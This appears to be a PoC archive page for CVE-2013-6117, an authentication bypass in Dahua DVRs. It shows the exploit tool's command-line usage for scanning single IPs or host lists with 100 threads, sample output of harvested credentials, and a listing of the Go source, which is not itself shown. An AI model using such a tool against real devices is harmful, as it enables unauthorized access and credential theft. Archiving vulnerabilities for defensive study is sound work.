Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2013-6117 PoC — Dahua Security DVR Appliances 身份验证绕过漏洞

Source
Associated Vulnerability
Title:Dahua Security DVR Appliances 身份验证绕过漏洞 (CVE-2013-6117)
Description:Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.
Description
CVE-2013-6117
Readme
**CVE-2013-6117**
   
```
$ ./CVE-2013-6117 -h
Options:

  -h, --help       display help information
  -f, --filename   File containing list of IP addresses
  -t, --target     Target IP
  -n, --threads    No of concurrent threads (default: 100)
```
   
```
$ ./CVE-2013-6117 -f hostfile.txt 
1.2.4.4|name.no-ip.org:80|username|password
```
  
```
$ ./CVE-2013-6117 -t 1.2.3.4
1.2.4.4|name.no-ip.org:80|username|password
```
  
Reference:  
https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117  
https://www.exploit-db.com/exploits/29673/  
File Snapshot

[4.0K] /data/pocs/24bd0fce5c1098f7676b81cb3ad794da0ab381a8 ├── [3.5K] CVE-2013-6117.go ├── [ 212] goreleaser.yml └── [ 564] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →